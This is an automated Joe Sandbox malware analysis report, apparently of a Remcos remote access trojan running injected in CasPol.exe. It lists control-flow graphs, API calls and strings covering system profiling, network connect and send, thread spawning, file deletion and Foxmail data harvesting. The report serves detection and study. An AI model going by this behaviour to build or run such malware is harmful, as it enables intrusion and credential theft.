                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1815803762-0
                                                                                                                  • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                  • Instruction ID: 265e42ecfadf18463eab4f7c57cd3d944434f2f899047e0b797dffc1cacfdca9
                                                                                                                  • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                                  • Instruction Fuzzy Hash: 06E06531318311BBEB310E21BC08F577AE4AF89B72F650A3AF251E40E4D2A288019A1C
                                                                                                                  APIs
                                                                                                                  • GetComputerNameExW.KERNEL32(00000001,?,0000002B,00474358), ref: 0041A7CF
                                                                                                                  • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7E7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Name$ComputerUser
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4229901323-0
                                                                                                                  • Opcode ID: b63fbe807418eda0a9fc1ee5865018707abb86735c4632f840b1adfcf73bb3ed
                                                                                                                  • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                                                                  • Opcode Fuzzy Hash: b63fbe807418eda0a9fc1ee5865018707abb86735c4632f840b1adfcf73bb3ed
                                                                                                                  • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                                                                                  APIs
                                                                                                                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A30,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoLocale
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2299586839-0
                                                                                                                  • Opcode ID: 31219136052544a26d77da0625eb89f11a5a625e23b8e682f5fa2601c68a04a1
                                                                                                                  • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                                                                                  • Opcode Fuzzy Hash: 31219136052544a26d77da0625eb89f11a5a625e23b8e682f5fa2601c68a04a1
                                                                                                                  • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 5 40d767-40d7e9 call 41bcf3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afd3 call 40e8bd call 401d8c call 43e830 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d94a call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 49 40dc96-40dca7 call 401eea 23->49 79 40d9a5-40d9ac call 40bed7 69->79 80 40d96d-40d98c call 401e8f call 4124b7 69->80 70->69 100 40e134-40e154 call 401e8f call 412902 call 4112b5 70->100 88 40d9b5-40d9bc 79->88 89 40d9ae-40d9b0 79->89 80->79 98 40d98e-40d9a4 call 401e8f call 412902 80->98 93 40d9c0-40d9cc call 41a473 88->93 94 40d9be 88->94 92 40dc95 89->92 92->49 103 40d9d5-40d9d9 93->103 104 40d9ce-40d9d0 93->104 94->93 98->79 107 40da18-40da2b call 401d64 call 401e8f 103->107 108 40d9db call 40697b 103->108 104->103 127 40da32-40daba call 401d64 call 41ae18 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 107->127 128 40da2d call 4069ba 107->128 118 40d9e0-40d9e2 108->118 120 40d9e4-40d9e9 call 40699d call 4064d0 118->120 121 40d9ee-40da01 call 401d64 call 401e8f 118->121 120->121 121->107 138 40da03-40da09 121->138 163 40db22-40db26 127->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a621 127->164 128->127 138->107 140 40da0b-40da11 138->140 140->107 142 40da13 call 4064d0 140->142 142->107 165 40dcaa-40dd01 call 436060 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->165 166 40db2c-40db33 163->166 164->163 189 40dad7-40db1d call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e call 401e18 call 401e13 164->189 220 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5f7 165->220 168 40dbb1-40dbbb call 4082d7 166->168 169 40db35-40dbaf call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 166->169 179 40dbc0-40dbe4 call 4022f8 call 4338d8 168->179 169->179 197 40dbf3 179->197 198 40dbe6-40dbf1 call 436060 179->198 189->163 203 40dbf5-40dc40 call 401e07 call 43e359 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 197->203 198->203 257 40dc45-40dc6a call 4338e1 call 401d64 call 40b125 203->257 272 40dd79-40dd7b 220->272 273 40dd5e 220->273 257->220 274 40dc70-40dc91 call 401d64 call 41ae18 call 40e219 257->274 276 40dd81 272->276 277 40dd7d-40dd7f 272->277 275 40dd60-40dd77 call 41bec0 CreateThread 273->275 274->220 292 40dc93 274->292 280 40dd87-40de66 call 401f66 * 2 call 41a696 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5f7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 275->280 276->280 277->275 330 40dea1 280->330 331 40de68-40de9f call 43361d call 401d64 call 401e8f CreateThread 280->331 292->92 332 40dea3-40debb call 401d64 call 401e8f 330->332 331->332 342 40def9-40df0c call 401d64 call 401e8f 332->342 343 40debd-40def4 call 43361d call 401d64 call 401e8f CreateThread 332->343 353 40df6c-40df7f call 401d64 call 401e8f 342->353 354 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 342->354 343->342 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5f7 call 40b95c 353->365 366 40dfba-40dfde call 41a7b2 call 401e18 call 401e13 353->366 354->353 365->366 386 40dfe0-40dfe1 SetProcessDEPPolicy 366->386 387 40dfe3-40dff6 CreateThread 366->387 386->387 390 40e004-40e00b 387->390 391 40dff8-40e002 CreateThread 387->391 394 40e019-40e020 390->394 395 40e00d-40e017 CreateThread 390->395 391->390 398 40e022-40e025 394->398 399 40e033-40e038 394->399 395->394 403 40e073-40e08e call 401e8f call 41246e 398->403 404 40e027-40e031 398->404 402 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a696 call 401eea 399->402 402->403 413 40e094-40e0d4 call 41ae18 call 401e07 call 412584 call 401e13 call 401e07 403->413 414 40e12a-40e12f call 40cbac call 413fd4 403->414 404->402 433 40e0ed-40e0f2 DeleteFileW 413->433 414->100 434 40e0f4-40e125 call 41ae18 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->414 435->434 437 40e0db-40e0e8 Sleep call 401e07 435->437 437->433
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
                                                                                                                    • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD11
                                                                                                                    • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
                                                                                                                    • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
                                                                                                                    • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
                                                                                                                    • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD40
                                                                                                                    • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
                                                                                                                    • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD54
                                                                                                                    • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                                    • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                                    • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                                    • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                                    • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                                    • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                                    • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
                                                                                                                    • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD98
                                                                                                                    • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                                    • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                                    • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
                                                                                                                    • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
                                                                                                                    • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
                                                                                                                    • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
                                                                                                                    • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
                                                                                                                    • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
                                                                                                                    • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                                    • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                                    • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
                                                                                                                    • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BE08
                                                                                                                    • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 0040D790
                                                                                                                    • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                                  • String ID: 0DG$@CG$@CG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-B3IX49$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                                                                                  • API String ID: 2830904901-1275367719
                                                                                                                  • Opcode ID: 8c6ac7746136b26f12d2da0e8c563ff5b98e98f38763885ab39becc5433802cb
                                                                                                                  • Instruction ID: 3e021a1a4b13f59cbd2257f1e4af8b1458c06fff599f70b9144805750af3581d
                                                                                                                  • Opcode Fuzzy Hash: 8c6ac7746136b26f12d2da0e8c563ff5b98e98f38763885ab39becc5433802cb
                                                                                                                  • Instruction Fuzzy Hash: 31329260B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 494 413fd4-41401f call 401faa call 41aa83 call 401faa call 401d64 call 401e8f call 43a5f7 507 414021-414028 Sleep 494->507 508 41402e-41407c call 401f66 call 401d64 call 401fbd call 41afd3 call 404262 call 401d64 call 40b125 494->508 507->508 523 4140f0-41418a call 401f66 call 401d64 call 401fbd call 41afd3 call 401d64 * 2 call 4085b4 call 4027cb call 401eef call 401eea * 2 call 401d64 call 405422 508->523 524 41407e-4140ed call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 401d64 call 4022f8 call 401d64 call 401e8f call 404101 508->524 577 41419a-4141a1 523->577 578 41418c-414198 523->578 524->523 579 4141a6-414242 call 40541d call 404cbf call 405ce6 call 4027cb call 401f66 call 41a696 call 401eea * 2 call 401d64 call 401e8f call 401d64 call 401e8f call 413f9a 577->579 578->579 606 414244-41428a WSAGetLastError call 41bc86 call 404c9e call 401f66 call 41a696 call 401eea 579->606 607 41428f-41429d call 4041f1 579->607 630 414b54-414b66 call 4047eb call 4020b4 606->630 613 4142ca-4142df call 404915 call 40428c 607->613 614 41429f-4142c5 call 401f66 * 2 call 41a696 607->614 629 4142e5-414432 call 401d64 * 2 call 404cbf call 405ce6 call 4027cb call 405ce6 call 4027cb call 401f66 call 41a696 call 401eea * 4 call 41a97d call 413683 call 4082dc call 440c61 call 401d64 call 401fbd call 4022f8 call 401e8f * 2 call 41265d 613->629 613->630 614->630 694 414434-414441 call 40541d 629->694 695 414446-41446d call 401e8f call 412513 629->695 642 414b68-414b88 call 401d64 call 401e8f call 43a5f7 Sleep 630->642 643 414b8e-414b96 call 401d8c 630->643 642->643 643->523 694->695 701 414474-4145a8 call 403b40 call 40cbf1 call 41adfe call 41aed8 call 41ad56 call 401d64 GetTickCount call 41ad56 call 41acb0 call 41ad56 * 2 call 41ac62 call 41aed8 * 5 call 40e679 695->701 702 41446f-414471 695->702 737 4145ad-414ac7 call 41aed8 call 4027ec call 40275c call 4027cb call 40275c call 4027cb * 3 call 40275c call 4027cb call 405ce6 call 4027cb call 405ce6 call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 40275c call 4027cb call 405ce6 call 4027cb * 5 call 40275c call 4027cb call 40275c call 4027cb * 7 call 40275c call 404468 call 401eea * 50 call 401e13 call 401eea * 6 call 401e13 call 4045d5 701->737 702->701 948 414ac9-414ad0 737->948 949 414adb-414ae2 737->949 948->949 950 414ad2-414ad4 948->950 951 414ae4-414ae9 call 40a767 949->951 952 414aee-414b20 call 405415 call 401f66 * 2 call 41a696 949->952 950->949 951->952 963 414b22-414b2e CreateThread 952->963 964 414b34-414b4f call 401eea * 2 call 401e13 952->964 963->964 964->630
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                                                                                                                  • WSAGetLastError.WS2_32 ref: 00414249
                                                                                                                  • Sleep.KERNEL32(00000000,00000002), ref: 00414B88
                                                                                                                    • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleep$ErrorLastLocalTime
                                                                                                                  • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-B3IX49$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
                                                                                                                  • API String ID: 524882891-3216469370
                                                                                                                  • Opcode ID: fb4277623446a57f4349aa3ee4574e48d3faf5c028d54bb1633e15e054248afb
                                                                                                                  • Instruction ID: 1c0fcd5d2769b0c1ed3f5537d8c306574ebe830810c6f13c8178cbf41d879861
                                                                                                                  • Opcode Fuzzy Hash: fb4277623446a57f4349aa3ee4574e48d3faf5c028d54bb1633e15e054248afb
                                                                                                                  • Instruction Fuzzy Hash: 3B525E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 971 411c81-411cca GetModuleFileNameW call 401faa * 3 978 411ccc-411d56 call 41ab48 call 401e8f call 40c854 call 401eea call 41ab48 call 401e8f call 40c854 call 401eea call 41ab48 call 401e8f call 40c854 call 401eea 971->978 1003 411d58-411de8 call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 4176b6 call 401e13 * 4 978->1003 1026 411df8 1003->1026 1027 411dea-411df2 Sleep 1003->1027 1028 411dfa-411e8a call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 4176b6 call 401e13 * 4 1026->1028 1027->1003 1027->1026 1051 411e9a 1028->1051 1052 411e8c-411e94 Sleep 1028->1052 1053 411e9c-411f2c call 401e8f call 403b40 call 403cbb call 403cdc call 4028cf call 401e07 call 4176b6 call 401e13 * 4 1051->1053 1052->1028 1052->1051 1076 411f3c-411f60 1053->1076 1077 411f2e-411f36 Sleep 1053->1077 1078 411f64-411f80 call 401e07 call 41b62a 1076->1078 1077->1053 1077->1076 1083 411f82-411f91 call 401e07 DeleteFileW 1078->1083 1084 411f97-411fb3 call 401e07 call 41b62a 1078->1084 1083->1084 1091 411fd0 1084->1091 1092 411fb5-411fce call 401e07 DeleteFileW 1084->1092 1094 411fd4-411ff0 call 401e07 call 41b62a 1091->1094 1092->1094 1100 411ff2-412004 call 401e07 DeleteFileW 1094->1100 1101 41200a-41200c 1094->1101 1100->1101 1103 412019-412024 Sleep 1101->1103 1104 41200e-412010 1101->1104 1103->1078 1105 41202a-41203c call 408339 1103->1105 1104->1103 1107 412012-412017 1104->1107 1110 412092-4120b1 call 401e13 * 3 1105->1110 1111 41203e-41204c call 408339 1105->1111 1107->1103 1107->1105 1122 4120b6-41211f call 40b027 call 401e07 call 401fbd call 4123f7 call 401e13 call 405422 1110->1122 1111->1110 1117 41204e-41205c call 408339 1111->1117 1117->1110 1123 41205e-41208a Sleep call 401e13 * 3 1117->1123 1143 412125-41226f call 41aed8 call 41ad56 call 4027ec call 4027cb * 6 call 40275c call 4027cb call 40275c call 404468 call 401eea * 10 1122->1143 1144 412274-41236b call 41aed8 call 4027ec call 4027cb * 6 call 40275c call 404468 call 401eea * 7 1122->1144 1123->978 1136 412090 1123->1136 1136->1122 1213 41236f-4123db call 401eea call 401e13 call 401eea * 8 1143->1213 1144->1213 1245 4123e0-4123f6 call 401eea 1213->1245
                                                                                                                  APIs
                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                                                                    • Part of subcall function 0041AB48: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB6F
                                                                                                                    • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                                    • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                                  • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                                                                                  • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                                                                                  • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                                                                                  • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                                                                                  • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                                                                  • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                                                                  • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00412060
                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4130039364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4130039364.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                                  • String ID: /stext "$HDG$HDG$>G$>G
                                                                                                                  • API String ID: 1223786279-3931108886
                                                                                                                  • Opcode ID: 8ba61eb44736636d62dfb388e49255975280aa85e724cfe8b41d178e08704754
                                                                                                                  • Instruction ID: 0ab8a3329a483972d05e881652f5f37e7f84d863b53285be69f93207c3ffadf7
                                                                                                                  • Opcode Fuzzy Hash: 8ba61eb44736636d62dfb388e49255975280aa85e724cfe8b41d178e08704754
                                                                                                                  • Instruction Fuzzy Hash: 890243311083414AC325FB61D891AEFB7D5AFD4308F50493FF98A931E2EF785A49C69A

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                                                    • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                    • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                                                    • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                    • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                    • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                    • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                    • Part of subcall function 100010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                                                    • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                  • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                                                  • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                                                  • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                                                  • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                                                  • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                                                  • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                                                  • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                                                  • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                                                  • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                                                  • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000C.00000002.4137058188.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                  • Associated: 0000000C.00000002.4136980742.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000000C.00000002.4137058188.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                  • String ID: )$Foxmail$ProgramFiles
                                                                                                                  • API String ID: 672098462-2938083778
                                                                                                                  • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                  • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                                                  • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                  • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1286 40428c-4042ad connect 1287 4043e1-4043e5 1286->1287 1288 4042b3-4042b6 1286->1288 1289 4043e7-4043f5 WSAGetLastError 1287->1289 1290 40445f 1287->1290 1291 4043da-4043dc 1288->1291 1292 4042bc-4042bf 1288->1292 1289->1290 1296 4043f7-4043fa 1289->1296 1293 404461-404465 1290->1293 1291->1293 1294 4042c1-4042e8 call 404cbf call 401f66 call 41a696 1292->1294 1295 4042eb-4042f5 call 420161 1292->1295 1294->1295 1308 404306-404313 call 420383 1295->1308 1309 4042f7-404301 1295->1309 1298 404439-40443e 1296->1298 1299 4043fc-404437 call 41bc86 call 404c9e call 401f66 call 41a696 call 401eea 1296->1299 1304 404443-40445c call 401f66 * 2 call 41a696 1298->1304 1299->1290 1304->1290 1321 404315-404338 call 401f66 * 2 call 41a696 1308->1321 1322 40434c-404357 call 420f44 1308->1322 1309->1304 1347 40433b-404347 call 4201a1 1321->1347 1333 404389-404396 call 4202fa 1322->1333 1334 404359-404387 call 401f66 * 2 call 41a696 call 4205a2 1322->1334 1344 404398-4043bb call 401f66 * 2 call 41a696 1333->1344 1345 4043be-4043d7 CreateEventW * 2 1333->1345 1334->1347 1344->1345 1345->1291 1347->1290
                                                                                                                  APIs
                                                                                                                  • connect.WS2_32(?,00F4B2F8,00000010), ref: 004042A5
                                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
